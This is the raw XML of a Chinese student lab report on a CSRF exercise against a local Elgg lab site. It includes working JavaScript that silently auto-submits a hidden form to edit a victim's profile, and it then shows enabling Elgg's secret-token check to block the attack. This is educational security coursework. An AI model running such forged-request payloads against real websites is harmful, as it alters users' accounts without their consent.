    <w:p w14:paraId="602D2A5D" w14:textId="77777777" w:rsidR="00335D2E" w:rsidRDefault="00335D2E" w:rsidP="00335D2E">
      <w:r>
        <w:t xml:space="preserve">    &lt;script type="text/javascript"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FBF1105" w14:textId="77777777" w:rsidR="00335D2E" w:rsidRDefault="00335D2E" w:rsidP="00335D2E">
      <w:r>
        <w:t xml:space="preserve">        function forge_post() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFCC17D" w14:textId="77777777" w:rsidR="00335D2E" w:rsidRDefault="00335D2E" w:rsidP="00335D2E">
      <w:r>
        <w:t xml:space="preserve">            var fields;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9795A1" w14:textId="77777777" w:rsidR="00335D2E" w:rsidRDefault="00335D2E" w:rsidP="00335D2E">
      <w:r>
        <w:t xml:space="preserve">            // The following are form entries need to be filled out by attackers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58540453" w14:textId="77777777" w:rsidR="00335D2E" w:rsidRDefault="00335D2E" w:rsidP="00335D2E">
      <w:r>
        <w:t xml:space="preserve">            // The entries are made hidden, so the victim won't be able to see them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A36BEE4" w14:textId="77777777" w:rsidR="00335D2E" w:rsidRDefault="00335D2E" w:rsidP="00335D2E">
      <w:r>
        <w:t xml:space="preserve">            fields += "&lt;input type='hidden' name='name' value='Alice'&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11460966" w14:textId="77777777" w:rsidR="00335D2E" w:rsidRDefault="00335D2E" w:rsidP="00335D2E">
      <w:r>
        <w:t xml:space="preserve">            fields += "&lt;input type='hidden' name='briefdescription' value='Boby is my Hero'&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E335FE" w14:textId="77777777" w:rsidR="00335D2E" w:rsidRDefault="00335D2E" w:rsidP="00335D2E">
      <w:r>
        <w:t xml:space="preserve">            fields += "&lt;input type='hidden' name='accesslevel[briefdescription]' value ='2'&gt; ";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159B23FF" w14:textId="77777777" w:rsidR="00335D2E" w:rsidRDefault="00335D2E" w:rsidP="00335D2E">
      <w:r>
        <w:t xml:space="preserve">            fields += "&lt;input type='hidden' name='guid' value='42'&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC0B57D" w14:textId="77777777" w:rsidR="00335D2E" w:rsidRDefault="00335D2E" w:rsidP="00335D2E">
      <w:r>
        <w:t xml:space="preserve">            // Create a &lt;form&gt; element.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFF8408" w14:textId="77777777" w:rsidR="00335D2E" w:rsidRDefault="00335D2E" w:rsidP="00335D2E">
      <w:r>
        <w:t xml:space="preserve">            var p = document.createElement("form");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2778F80E" w14:textId="77777777" w:rsidR="00335D2E" w:rsidRDefault="00335D2E" w:rsidP="00335D2E">
      <w:r>
        <w:t xml:space="preserve">            // Construct the form</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D1000F" w14:textId="77777777" w:rsidR="00335D2E" w:rsidRDefault="00335D2E" w:rsidP="00335D2E">
      <w:r>
        <w:t xml:space="preserve">            p.action = "http://www.csrflabelgg.com/action/profile/edit";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFC2A85" w14:textId="77777777" w:rsidR="00335D2E" w:rsidRDefault="00335D2E" w:rsidP="00335D2E">
      <w:r>
        <w:t xml:space="preserve">            p.innerHTML = fields;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F81FD0" w14:textId="77777777" w:rsidR="00335D2E" w:rsidRDefault="00335D2E" w:rsidP="00335D2E">
      <w:r>
        <w:t xml:space="preserve">            p.method = "post";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E92CD3" w14:textId="77777777" w:rsidR="00335D2E" w:rsidRDefault="00335D2E" w:rsidP="00335D2E">
      <w:r>
        <w:t xml:space="preserve">            // Append the form to the current page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776998AE" w14:textId="77777777" w:rsidR="00335D2E" w:rsidRDefault="00335D2E" w:rsidP="00335D2E">
      <w:r>
        <w:t xml:space="preserve">            document.body.appendChild(p);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291338FC" w14:textId="77777777" w:rsidR="00335D2E" w:rsidRDefault="00335D2E" w:rsidP="00335D2E">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            // Submit the form</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617DD311" w14:textId="77777777" w:rsidR="00335D2E" w:rsidRDefault="00335D2E" w:rsidP="00335D2E">
      <w:r>
        <w:t xml:space="preserve">            p.submit();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331723DE" w14:textId="77777777" w:rsidR="00335D2E" w:rsidRDefault="00335D2E" w:rsidP="00335D2E">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C7DCAF" w14:textId="77777777" w:rsidR="00335D2E" w:rsidRDefault="00335D2E" w:rsidP="00335D2E">
      <w:r>
        <w:t xml:space="preserve">        // Invoke forge_post() after the page is loaded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2369E1AB" w14:textId="77777777" w:rsidR="00335D2E" w:rsidRDefault="00335D2E" w:rsidP="00335D2E">
      <w:r>
        <w:t xml:space="preserve">        window.onload = function () { forge_post(); }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30032A86" w14:textId="77777777" w:rsidR="00335D2E" w:rsidRDefault="00335D2E" w:rsidP="00335D2E">
      <w:r>
        <w:t xml:space="preserve">    &lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04832283" w14:textId="77777777" w:rsidR="00335D2E" w:rsidRDefault="00335D2E" w:rsidP="00335D2E">
      <w:r>
        <w:t>&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CFA82C" w14:textId="77777777" w:rsidR="00335D2E" w:rsidRDefault="00335D2E" w:rsidP="00335D2E"/>
    <w:p w14:paraId="7276EA3B" w14:textId="7A737CBE" w:rsidR="00335D2E" w:rsidRDefault="00335D2E" w:rsidP="00335D2E">
      <w:r>
        <w:t>&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396E9331" w14:textId="4B0C20B8" w:rsidR="00E04D35" w:rsidRDefault="0042392E" w:rsidP="005E5D65">
      <w:r>
        <w:t>实验指导给的js代码有误</w:t>
      </w:r>
      <w:r w:rsidR="00335D2E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，使用了中文单引号，全部改为英文单引号。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B50044B" w14:textId="3CC0DBA1" w:rsidR="00335D2E" w:rsidRDefault="00335D2E" w:rsidP="005E5D65">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>替换之前的index.</w:t>
      </w:r>
      <w:r>
        <w:t>html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="004D11F8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并且注意，windows中</w:t>
      </w:r>
      <w:r w:rsidR="003E6002">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="003E6002">
        <w:t>RLF</w:t>
      </w:r>
      <w:r w:rsidR="003E6002">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的换行符需要改为L</w:t>
      </w:r>
      <w:r w:rsidR="003E6002">
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidR="003E6002">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB67818" w14:textId="6C2A0AEE" w:rsidR="003E6002" w:rsidRDefault="003E6002" w:rsidP="005E5D65"/>
    <w:p w14:paraId="23F240FA" w14:textId="72BFE258" w:rsidR="003E6002" w:rsidRDefault="00B04985" w:rsidP="005E5D65">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>点击链接后自动跳转，得到如下页面，攻击成功。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B18EFB" w14:textId="7E3CC7CD" w:rsidR="00EB7D14" w:rsidRDefault="00B04985" w:rsidP="00B04985">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="277D4B39" wp14:editId="71EB961A">
            <wp:extent cx="3007252" cy="1434365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739" cy="14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FA01" w14:textId="014C382E" w:rsidR="006E542D" w:rsidRDefault="006E542D" w:rsidP="006E542D">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>两个问题的答案</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6413F069" w14:textId="58E9B313" w:rsidR="006E542D" w:rsidRDefault="006E542D" w:rsidP="006E542D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>问题1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1887C522" w14:textId="3D096B21" w:rsidR="006E542D" w:rsidRDefault="006E542D" w:rsidP="006E542D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过对alice发起好友请求，查看提交的参数中的guid，从而获得alice的guid。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5FAD9A" w14:textId="074076D0" w:rsidR="006E542D" w:rsidRDefault="006E542D" w:rsidP="006E542D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>问题</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1ABCAA" w14:textId="00743DB0" w:rsidR="006E542D" w:rsidRPr="006E542D" w:rsidRDefault="0081251C" w:rsidP="006E542D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不可以，因为C</w:t>
      </w:r>
      <w:r>
        <w:t>SRF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是事先写好的链接，像本次试验里需要构造一个guid参数，那么便限制了攻击范围只能是某个特定人。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FCEE86" w14:textId="67D60A30" w:rsidR="00B04985" w:rsidRDefault="00B04985" w:rsidP="00B04985">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Task</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1951B1C6" w14:textId="6D599C48" w:rsidR="00B04985" w:rsidRDefault="00B877A2" w:rsidP="00B04985">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打开之前生成但是没有起作用的token验证。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CD65CE" w14:textId="1CF9C704" w:rsidR="00B877A2" w:rsidRDefault="00B877A2" w:rsidP="00B04985">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进入对应目录。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35549E73" w14:textId="28C4215A" w:rsidR="00B877A2" w:rsidRDefault="00B877A2" w:rsidP="00B04985">
      <w:r w:rsidRPr="00B877A2">
        <w:t>cd  /var/www/CSRF/Elgg/vendor/elgg/elgg/engine/classes/Elgg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07404BAC" w14:textId="791BD217" w:rsidR="00B877A2" w:rsidRDefault="004F431B" w:rsidP="00B04985">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="004F431B">
        <w:t>ActionsService.php</w:t>
      </w:r>
      <w:r w:rsidR="00E766A3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>找到</w:t>
      </w:r>
      <w:r w:rsidR="00E766A3" w:rsidRPr="00E766A3">
        <w:t>gatekeeper()</w:t>
      </w:r>
      <w:r w:rsidR="00E766A3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B57B152" w14:textId="79B833D2" w:rsidR="004263B9" w:rsidRDefault="004263B9" w:rsidP="00B04985">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注释掉第一句的return</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0847F4E5" w14:textId="05D6FC21" w:rsidR="00E766A3" w:rsidRDefault="004263B9" w:rsidP="00B04985">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23934326" wp14:editId="130D1CF0">
            <wp:extent cx="5274310" cy="22072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D610" w14:textId="1D6A80F2" w:rsidR="00B04985" w:rsidRDefault="004E49B9" w:rsidP="00B04985">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>再次点击攻击链接，无法修改，无法自动跳转，一直自动刷新</w:t>
      </w:r>
      <w:r w:rsidR="005F13F5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，攻击失败。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2ED541" w14:textId="4B34A3E8" w:rsidR="004E49B9" w:rsidRDefault="004E49B9" w:rsidP="00B04985">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5770F90D" wp14:editId="721B266B">
            <wp:extent cx="5274310" cy="13004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DF9C" w14:textId="115530F8" w:rsidR="006778EC" w:rsidRPr="00B04985" w:rsidRDefault="006778EC" w:rsidP="00B04985">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>原因是因为token参数是一直变化的，但是我们csrf攻击只能通过提前预设参数，在html文件中嵌入攻击代码和预设好的参数进行攻击。如果对token这个随机的数字进行检验，那么csrf将无法完成攻击。</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="006778EC" w:rsidRPr="00B04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8A4781" w14:textId="77777777" w:rsidR="002A4C1A" w:rsidRDefault="002A4C1A" w:rsidP="006E542D">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="33A42E5D" w14:textId="77777777" w:rsidR="002A4C1A" w:rsidRDefault="002A4C1A" w:rsidP="006E5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C3211" w14:textId="77777777" w:rsidR="002A4C1A" w:rsidRDefault="002A4C1A" w:rsidP="006E542D">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="05358C75" w14:textId="77777777" w:rsidR="002A4C1A" w:rsidRDefault="002A4C1A" w:rsidP="006E54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5B"/>
    <w:rsid w:val="00043C99"/>
    <w:rsid w:val="000676CF"/>
    <w:rsid w:val="00067973"/>
    <w:rsid w:val="00075469"/>
    <w:rsid w:val="001B496C"/>
    <w:rsid w:val="00202F11"/>
    <w:rsid w:val="002317D9"/>
    <w:rsid w:val="002A4C1A"/>
    <w:rsid w:val="002C605B"/>
    <w:rsid w:val="00335D2E"/>
    <w:rsid w:val="003A05F7"/>
    <w:rsid w:val="003B3802"/>
    <w:rsid w:val="003E6002"/>
    <w:rsid w:val="00420D6D"/>
    <w:rsid w:val="0042392E"/>
    <w:rsid w:val="004263B9"/>
    <w:rsid w:val="004309CB"/>
    <w:rsid w:val="0043687A"/>
    <w:rsid w:val="004462B6"/>
    <w:rsid w:val="004D11F8"/>
    <w:rsid w:val="004E49B9"/>
    <w:rsid w:val="004F431B"/>
    <w:rsid w:val="00523AF4"/>
    <w:rsid w:val="00561447"/>
    <w:rsid w:val="005B2067"/>
    <w:rsid w:val="005E5D65"/>
    <w:rsid w:val="005F13F5"/>
    <w:rsid w:val="006778EC"/>
    <w:rsid w:val="00690171"/>
    <w:rsid w:val="006E542D"/>
    <w:rsid w:val="007713A9"/>
    <w:rsid w:val="0081251C"/>
    <w:rsid w:val="00835D1E"/>
    <w:rsid w:val="00863DD5"/>
    <w:rsid w:val="00893A4A"/>
    <w:rsid w:val="008B7ED2"/>
    <w:rsid w:val="00921032"/>
    <w:rsid w:val="009475C7"/>
    <w:rsid w:val="009712C5"/>
    <w:rsid w:val="009951E0"/>
    <w:rsid w:val="009D60D8"/>
    <w:rsid w:val="009F0D1C"/>
    <w:rsid w:val="009F2740"/>
    <w:rsid w:val="00AB33CE"/>
    <w:rsid w:val="00AC5C71"/>
    <w:rsid w:val="00B04985"/>
    <w:rsid w:val="00B27ABC"/>
    <w:rsid w:val="00B62D37"/>
    <w:rsid w:val="00B751F5"/>
    <w:rsid w:val="00B877A2"/>
    <w:rsid w:val="00C36FDA"/>
    <w:rsid w:val="00CB435B"/>
    <w:rsid w:val="00CD2975"/>
    <w:rsid w:val="00D54246"/>
    <w:rsid w:val="00D955AB"/>
    <w:rsid w:val="00DE4CC0"/>
    <w:rsid w:val="00E04D35"/>
    <w:rsid w:val="00E766A3"/>
    <w:rsid w:val="00E904B6"/>
    <w:rsid w:val="00EB7D14"/>
    <w:rsid w:val="00FB01C7"/>
    <w:rsid w:val="00FD3BD3"/>
    <w:rsid w:val="00FE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364A2"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{F224A612-C334-4724-ACD3-98AE73200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D60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D60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4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D60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D60D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713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713A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AB33CE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6E54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E542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E54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E542D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E542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30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://www.csrflabattacker.com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://www.csrflabelgg.com/action/friends/add?friend=43&amp;__elgg_ts=1599724915&amp;__elgg_token=2rA_9cc7S6L8E" TargetMode="External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hyperlink" Target="http://www.csrflabelgg.com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473</Words>
  <Characters>2702</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>22</Lines>
  <Paragraphs>6</Paragraphs>
  <ScaleCrop>false</ScaleCrop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正涵</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>唐 正涵</cp:lastModifiedBy>
  <cp:revision>59</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-09-10T06:59:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-09-12T05:57:00Z</dcterms:modified>
</cp:coreProperties>
</file>